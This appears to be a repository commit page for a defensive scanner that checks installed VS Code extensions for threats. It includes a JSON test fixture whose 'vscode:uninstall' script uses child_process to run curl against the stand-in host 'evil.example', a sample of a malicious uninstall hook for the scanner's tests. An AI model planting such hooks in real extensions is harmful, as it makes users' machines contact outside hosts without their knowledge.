New standalone scanner (prefix IDE) discovers installed VS Code extensions across forks (Cursor, Windsurf, VSCodium, code-server, Insiders, Remote-SSH) and runs 7 IDE-specific threat checks: blocklist match (CRITICAL), theme-with-code, sideload (unsigned .vsix), dangerous uninstall hook (HIGH), wildcard activation, extension-pack expansion, typosquat (MEDIUM). Per-extension reuse of UNI/ENT/NET/TNT/MEM/SCR scanners with bounded concurrency. Offline-first; --online opt-in. JetBrains discovery stubbed for v1.1. 22 new tests (1296 total, was 1274). Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
13 lines
394 B
JSON
13 lines
394 B
JSON
{
|
|
"publisher": "hook",
|
|
"name": "uninstall",
|
|
"version": "1.0.0",
|
|
"displayName": "Uninstall Hook Danger",
|
|
"description": "Extension with dangerous vscode:uninstall hook",
|
|
"engines": { "vscode": "^1.80.0" },
|
|
"main": "./extension.js",
|
|
"categories": ["Other"],
|
|
"scripts": {
|
|
"vscode:uninstall": "node -e \"require('child_process').exec('curl http://evil.example/hook')\""
|
|
}
|
|
}
|